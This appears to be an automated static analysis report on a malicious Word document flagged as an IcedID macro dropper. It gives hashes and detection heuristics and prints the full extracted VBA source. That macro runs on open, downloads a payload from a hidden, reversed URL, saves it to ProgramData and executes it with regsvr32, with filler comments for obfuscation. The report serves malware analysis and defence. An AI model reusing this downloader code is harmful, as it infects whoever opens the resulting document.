Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cce919ff5db9c773…

MALICIOUS

Office (OOXML)

Size: 141.1 KB
Created: 2020-10-13 10:58:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-10-16
MD5: e261f131a690a684df19976be8703ecb
SHA-1: b7b554c968e85c6b68f0760b4d3cef94c7ec6925
SHA-256: cce919ff5db9c773e0965498d812377b6ee5e88a5d9885810ff480c04741a649
Risk Score: 230

Heuristics 6

  • ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set lPKls = CreateObject("Script" + LYWOU)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 12057 bytes
SHA-256: e9306b0182d67639456da93a24ffb39276ab82015518ff9eb986116636412949
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "RxaCt"
Sub wnvzC(QBYwq, Optional ByVal AHCbJ As String = "c:\programdata\oIXPT.txt", Optional ByVal LYWOU As String = "ing.FileSystemObject")
' Puritans atombomb iridium
' Chieftain circumstances
' Onagers insurgent caftan pioneered clutched
' Exercise abode placid
' Moraine stupid blender dumpy
' Revolutions
' Tongs terser plasterboard
' Rejoices nightmares flips teas
' Commendable adieux blamed avalanche
' Bonnie
' Avian oranges heightened benelux
' Stratagems drive zoologist scrolling hunger
Set lPKls = CreateObject("Script" + LYWOU)
' Xrays workloads disqualification clinked
' Knotting involved sinusoidally idiosyncratically
' Prejudice
' Thunderstruck hysteric knuckles
' Pears seasonable wanderer destitution
Set rtrwy = lPKls.CreateTextFile(AHCbJ)
' Debacles racings unlink duckling coprocessor envelops
' Personifying neuralgia
' Demagnetise biotic
' Streptomycin propositioning crusted fusion silage
' Recoverability
' Mute remaking
' Cataracts sedges stockist
rtrwy.WriteLine QBYwq
' Civilians cytogenetic rhizome
' Inexperience gleam reappear
' Truer jazziest burns gangway linoleum
' Rivals aural elapses foams
rtrwy.Close
' Exponential breastfeed comprehensives cyphers shipwreck
' Repeaters
' Partitions cherish staunching harmonica
' Rivalling rectification blackboards
' Sack friendships beasts infarction chilled
' Response dockyards plaint
' Exotic
' Peevishly impales cinema maximiser
' Prompt contaminate
' Tempts delivers vortex ceramics luminescent
' Solecism souls section
' Otherwise lungful titillated peacock marshal empowering
' Vaporisation falter ana footballing
' Nectar tonsillectomy incomprehensible
' Anthologised boxoffice withdraws brewage
' Remade vitriol rector
' Planets barefoot barbarous
' Overlying hotspot orderliness rampaged
' Daughters
' Guesswork craws
' Explosives lovable saute congregation outfield
' Seashores sticker rapists extricating
' Chaotic share lobotomist unploughed sublunary babylon
' Wanders archaic rhea writer demounted
' Dependence
' Piercingly disablement reticule reacquisition heptagon
' Jeep capitalises cockshies
' Selfconscious mousetraps
' Cordillera
' Gravestone innovated
' Vegetational mopes inscrutability millers jazz integrability display
' Clanking unsmooth gauges equips chipboard
' Minim chimpanzee
' Incline reschedule couriers
' Entrails matchmaking
' Alumni pixels greenfield
End Sub
' Louts incriminated
' Cacophony tarzan
' Adulterates duplicability doorstep
' Annul waitress
' Admen entry voluble circularise
' Pavement linked
Sub AutoOpen()
' Esteem pilgrims wakes agents
' Grossed upsidedown shrinks blockbuster bated
' Proximate
' Slacker amalgamation touchiness ribcage
' Grants birthrights abduction survivors
' Reprovingly
' Scarified examiners unsighted ricks
' Point monasteries
' Verifiability disliked knesset
' Corporals belittle
' Shelve classiest
' Fattened puissant crashlanded stems
' Mangles opposite xenophobia
' Parameter sweetening
' Slick capriciously
' Lithograph pantograph debut
' Singleness
' Neonatal goodhope commemorates wetsuit
' Typographer benevolence ambivalent mariners crossexamined hands arrive
' Benchmark
' German mingles truncate articulation
' Academies scavenged
' Millstone capitally
' Formulates bulldozers section
' Vigil enmities
' Expired uninsurable
' Slogged prostate unsoiled bloomers lobes
Dim izVGk As New Aeuec
' Ancestry gatecrash ejected ganglia inland companions
' Recirculated instanced bouts
' Stilts complimented tot
' Staunch fortifying anger
' Spanner informatively extradite
' Grotesqueness
QBYwq = izVGk.bQbaR("MSXML2.serverXMLHTTP")
' Doings interrogator earthen clicking propagating
' Orangutans photo dually acrylic meek
' Explanatory pump straight
' Stalled pallmall
wnvzC BcBPC(QBYwq)
' Direction seismologist midshipman
' Asbestosis avidly launderettes tot taxis declamation
' Quakes immaculately characterful patently dirges
' Taramasalata capitulate
' Brute
' Mulling actings primitively
' Reopened reconvened
' Weeper stereoscopy veritable atmospheric
' Legwork unilateral
' Separations cockpits
' Jerkins afflicting painstaking armada
' Idled oxtails drummed exeunt
' Informs unstack pasteurised engraved flattens uneaten
' Revaluation mated subbed inviolate encore
AdjIn kGmwO(0) + "vr32 c:\programdata\oIXPT.txt", "ws"
End Sub
Function OWnZV(KFpFM, nfdDd)
' Coiling pennants
' Wayside moated upstages
' Stations rapports bender colliding
' Abominations howling pensionable nationalised ophthalmic circularised
' Brabbles masterpiece stalwarts atrophies critical bullock
OWnZV = Split(KFpFM, nfdDd)
End Function

Attribute VB_Name = "eBJXY"
' Fairies boardrooms boudoirs plunging holds
' Lecturers bulldogs surroundings painlessly
' Sinus gigolo tartrate unprejudiced
' Snooping tourists compress brokers
' Anatomies
Function BcBPC(cpqSH)
' Prejudge ways conservationist timescale heir
' Memory
' Primness sulkiest
' Spadework fidgety finial
' Balances microfilming isolationism
' Computations evaded
' Procurements chastised sneak renounced
' Vermin atrocities haunt
BcBPC = StrConv(cpqSH, vbUnicode)
' Epitaph vilest catapulting reservoirs
' Southernmost sale earthling
' Wire condemns deniable sawyers attractor
' Measures
' Android demonstratively collide growers ostracise
' Reflected redeemable rationed
' Amplifying everincreasing dishonourable
' Fatty latitude
End Function
' Noel
' Postmistress
' Prices
' Gunpoint
' Yolk leaded perishing
Function fFaJz()
' Captives selfcentredness
' Fielded lampoon bespeaking
' Segment change fiftieth
' Prurient carroty quenched retreats
' Turks slipperiness colossal
' Antagonistic starer advises
' Hooter familiarity
' Resurrect
' Jeremiah slimmest anonymity
' Exhilarating
' Severity cuddling
With ActiveDocument.shapes(1)
fFaJz = .AlternativeText
End With
End Function
' Academies lawmaker engagements
' Grisliest external inadequacies impresario subcommittees
' Discomfit immigrants baaing
' Undifferentiated draughtsmen
' Chutney consensual
' Engorged bleaker
Function kGmwO(QurcP)
' Galilean abeam dissimilar
' Subsidiarity scrotum foe neural hyperbolic yolk
' Squaw fieldworkers botch encyclopedic
' Palpitating donut placate careworn ore
' Poltroon substantiate navigated vaccinated
' Meshes pattering weathermen
' Seronegative carers
' Visas illusion bungles promising waterskiing
' Haitian technocracies
' Underperformance spacers unclench
' Transaction patrols muddier
' Liberates corrections emulated
XGCOM = fFaJz()
cfqNf = OWnZV(XGCOM, "###")
MoZOI = cfqNf(QurcP)
kGmwO = MoZOI
End Function

Attribute VB_Name = "Aeuec"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    Reverse = StrNew
End Function
' Circumcise cardboard las freckled pipings divide warns
' Prepayment unlit vineyard
' Encourage emu resiny
' Ungraciously
' Vilified
' Requisite
Function bQbaR(DdGps)
' Evaporating taxidermist herself derisive
' Quenched toothed debatable garrets
' Reopening tilling
' Philology purposefully paymasters onward heartwarming supercritical angstroms
Dim fIwKD As Object
' Flipping constitutional aggravated
' Timers premises
' Commander histogram
' Nonessentials
' Gestation betimes spurge stall
' Camps
' Plush untypically monopolised nonessentials
' Dearer lowlanders incandescently prosody adjudicate fibres
' Glooms sneezed dissolved imparting
' Outlives engulfs
' Patisserie hydraulics revivifying
Set fIwKD = CreateObject(DdGps)
' Planted gravity repaired
' Broadcasters absolution arbitrated extras
' Equalling liveable dialectics
' Miscellanies
' While jarl baronial waggles
' Camping retrofitting
' Reminding perfidious screeches consequential mailbox
' Accessible differed versatile
' Yells lector amid flubbed shrugging obscenities
' Rarer minimalistic notching
' Doubters
' Childbearing plushy light overtightened gangs understated
' Registry firebombs
' Snapshots processors school bleeping unmatched teleprinters
' Shouting
' Previewers perk express eyed couturiers suasion observatories imperceptible
' Infra cycle metronomes flourishes taxdeductible
' Demoralisation gypsies recommendations basest
' Fined cartridges rocks telescoped
' Shoemaker conclusions retiring spoken
' Routs accra
' Athleticism detente chorals format saturating
' Fans disembowelled
' Attests unconstrained
' Clasp penetratingly instinctively positionable
kEtzP = kGmwO(1)
' Avalanches getrichquick
' Bullies humpback skier clouding
' Voluntarily biasses
' Spain dislodge
fIwKD.Open "GET", Reverse(kEtzP), False
' Wraparound revamping borer contradicting
' Missuses sirloin grubby resiting chauffeured setup
' Dimmest calibrators inquorate
' Fashioned
' Fathoms dodge
fIwKD.Send
' Prim chivalrous unwilling collaboratively alkalinity hamlets soweto
' Ripe impossible pollutes
' Shunters whirligig spurted delight
' Polecats dousing
' Unfold determiner groovier
bQbaR = fIwKD.responsebody
End Function

Attribute VB_Name = "XZvUC"
Sub AdjIn(HQwQT, OniCN)
' Rid
' Olympiad brasiers beneath ethological
' Boardroom volumetric
' Imbeds fuelled obedient
' Dissonances gophers
' Archbishop magnums diatribes
Set kaHFl = CreateObject(OniCN + "cript.shell")
' Crave wandering
' Rebalanced nonbeliever frighteners retreating
' Altering gdansk squeamishly
' Aviation beachy hell triumphing propagated
' Redirect paintings satchel efficiencies
' Scares pitons strokes wicker
' Brainlessly comely hats latched radiogalaxy
' Weapons unisons fawns trafficker thrasher folklorist
' Demonise roebuck cordials severest glorifies
' Flatterer potentate quashed immoderate sarge iconoclasts cuckoos
' Smilingly mandarins sepulchral complicate
' Dispossession terminate essence
' Spread hippies
' Unearthly extraterrestrial commonlaw differentiating
' Annotations apiaries reeking selfconsciously
' Deafer wrathfully prospering lengthier algebraical
' Unfeasible repertory retorting stow desk
' Adjusted capitalise psychedelic distinguishably flukes
' Granule mitigatory
' Chaired intoned empathy anxiously
' Hobs desensitising notations beachhead scruffier scratchy hobbles futurism
' Transportation
' Repairing treasonous listener
' Afloat debrief decayed baboon
' Struggling consent negligence reputedly prises overstepping rescans
' Swimsuits pitiably performances neuter zippy
' Shuttered hung environmentalism
' Contouring palpate
' Hotbeds obscurity quaternary paediatricians
' Overspent bosnia
' Damages eyelike excusable renegotiation
' Rescinded interactions warlike
' Runt
' Underplays capping cursed
' Unsaddled gong hotplate gin
' Indoctrinates ratepayer shoals celestial
' Explosions crossexamines communication subventions
' Visibly
' Missals hypocrites srilanka ephor geochemical indecorous
' Byline
' Uncontroversial consorting
' Billy joystick
' Hereinafter
' Unlabelled pipers gel counsel
' Propositions
' Multiplicative odours
' Indeterminable choreography
kaHFl.exec HQwQT
' Disaffiliated realisations resume hippo headscarves
' Photoelectrically balance personality hopefuls faring
' Translational clergy ventriloquy gypsy
' Indirectness desisted
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 45056 bytes
SHA-256: eff7a35293f7d8a12f5730993e633d3bff5f08ce48d3b2f0344984791d786568
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely